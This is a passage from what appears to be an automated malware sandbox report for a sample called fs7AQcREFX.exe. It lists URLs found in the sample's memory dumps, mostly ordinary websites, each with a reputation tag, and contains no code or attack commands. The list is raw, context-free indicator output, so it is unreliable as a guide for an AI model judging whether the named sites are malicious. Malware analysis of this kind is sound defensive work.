                                                                                                                                                                                                                                      http://www.valselit.com/174-appartement-a-vendre-grenoble-30514fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://www.pwd.org/fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?verfs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://net3.necs.com/pohlfood/site/search?selectview=byclass&amp;queryCol=&amp;terms=pizzafs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://www.item-pr.com/q8fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=Mediterranfs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://pohlfood.com/comments/feed/fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://www.com-sit.com/testhouse/fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            http://www.com-sit.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.cssfs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              http://www.iamdirt.com/6-bfs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://www.aevga.com/fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.397997118.0000000003600000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.398199427.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517172157.0000000000B90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://www.pwd.org/dfs7AQcREFX.exe, 00000000.00000003.621337796.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626959422.000000000617C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://www.evcpa.com/nJfs7AQcREFX.exe, 00000000.00000003.617704098.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://www.myropcb.com/services-capabilities/pcb-restoration/fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://www.nunomira.com/llfs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=Lfs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006154000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                http://gmpg.org/xfn/11fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://www.cloudflare.com/5xx-error-landingfs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, 